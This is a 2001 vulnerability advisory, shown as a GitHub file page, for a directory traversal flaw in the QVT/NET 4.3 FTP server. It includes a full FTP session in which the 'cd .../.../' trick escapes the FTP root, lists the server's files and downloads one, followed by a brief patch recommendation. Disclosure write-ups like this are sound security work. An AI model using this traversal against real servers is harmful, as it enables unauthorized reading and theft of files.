-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathCVE-2001-0680.txt
108 lines (72 loc) · 2.93 KB
/
CVE-2001-0680.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
======================================================================
QVT/NET 4.3 FTP server Directory Traversal
Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org
Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d
vicente F0x no rulas wey!
======================================================================
------------------------=[Brief Description]=-------------------------
QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory and see files to PATH
also GET files remotely.
----------------------------=[Plataforms]=-------------------------------
Windows 9.x
Windows NT
windows 2000
-----------------------------=[Summary]=---------------------------------
When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.
EXploit:
C:\>ftp server.vulnerable.com
Connected to server.vulnerable.com.
220 shell FTP server (QVT/Net 4.3) ready.
User (server.vulnerable.com:(none)): anonymous
331 Guest login OK, please send real ident as password.
Password:
230 Guest login OK, access restrictions apply.
ftp> cd ..
501 CWD command not allowed.
SO THE BUG... ...
ftp>cd .../.../.../.../.../.../
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes).
-rwxrwxrwx 1 nobody system 246928 Jan 18 13:10 nc.exe
drwxrwxrwx 1 nobody system 0 Jan 18 15:39 Netscape 6
drwxrwxrwx 1 nobody system 0 Jan 18 14:50 Netscape 6 Setup
-rwxrwxrwx 1 nobody system 3209110 Jan 19 10:51 icq.exe
-rwxrwxrwx 1 nobody system 6330449 Jan 19 12:01 porn.exe
drwxrwxrwx 1 nobody system 0 Jan 18 17:44 norton
drwxrwxrwx 1 nobody system 0 Jan 19 11:14 Program Files
drwxrwxrwx 1 nobody system 0 Jan 19 12:04 plugins
.
.
.
.
-rwxrwxrwx 1 nobody system 0 May 4 13:05 hacksites.txt
drwxrwxrwx 1 nobody system 0 May 4 16:51 XXXX
drwxrwxrwx 1 nobody system 0 May 8 13:17 teens
drwxrwxrwx 1 nobody system 0 May 8 13:18 tmp
-rwxrwxrwx 1 nobody system 168 May 21 19:07 raza-alt3kx.txt
226 Transfer complete.
ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec.
ftp> get raza-alt3kx.txt
200 PORT command successful.
150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106)
(168 bytes).
226 Transfer complete.
ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec.
ftp>quit
221 Goodbye.
C:\>type raza-alt3kx.txt
Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>
C:\>
-------------------------------=[Patch]=---------------------------------
The recomended action is to changue the persmissions or define
individual directory for users anonymous with files no compromise.
-------------------------=[Company Compromise]=--------------------------
Company:
http//www.qpc.com